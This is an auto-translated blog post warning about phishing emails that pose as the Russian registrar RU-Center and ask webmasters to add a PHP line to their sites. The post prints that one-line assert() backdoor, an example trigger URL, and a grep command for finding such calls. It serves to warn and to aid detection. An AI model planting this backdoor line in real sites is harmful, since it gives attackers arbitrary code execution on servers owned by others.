Blog "Новичков Максим на QWERTY.blog"

This is an automatic translation.

Today several of my friends received letters purporting to come from RU-Center (nic.ru, the largest Russian domain name registrar), which read:

The letters were sent from the address info@nic.technical. In them the attackers, writing on behalf of RU-Center, ask the recipient to place on the site code with the following content:

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?> 

Unfortunately, many of our colleagues who call themselves "webmasters" (the numerous site owners) do not know PHP and do not see the danger in the line above. When assert() is given a string, PHP does not check a condition: it evaluates the string as PHP code (this is how assert() behaved in PHP 5 and PHP 7; the string form was deprecated in 7.2 and removed in 8.0). $_REQUEST[RUCENTER] is whatever the visitor sends in the RUCENTER parameter of the query string or POST body (and, depending on request_order, a cookie), and stripslashes() merely removes the backslashes that magic quotes would have inserted, so the quotes in the attacker's code arrive intact. That one line is a complete remote-code-execution backdoor for anyone who knows the parameter name. Be careful!

I recommend inspecting your PHP projects for code that calls assert() or eval(). If such calls are present, do not panic: read what each one does and where its argument comes from. Legitimate uses exist (a developer's sanity check on a literal condition, for example), but any call whose argument can be influenced by a request is a backdoor. In the example above, the line lets the attackers run arbitrary PHP on your site simply by requesting it with the RUCENTER parameter, e.g. http://sistema-audit.ru/?RUCENTER=PHP-code

We recommend searching the site files, for example on Linux with grep -rniE 'assert|eval' /home/www/mysite/ , giving the folder that holds the site's files; this lists every file and line number in which either instruction appears. Pass the directory itself rather than /home/www/mysite/*, because the shell glob skips files and directories whose names begin with a dot, which is exactly where a planted file is likely to hide.

Take care of yourself and your sites!

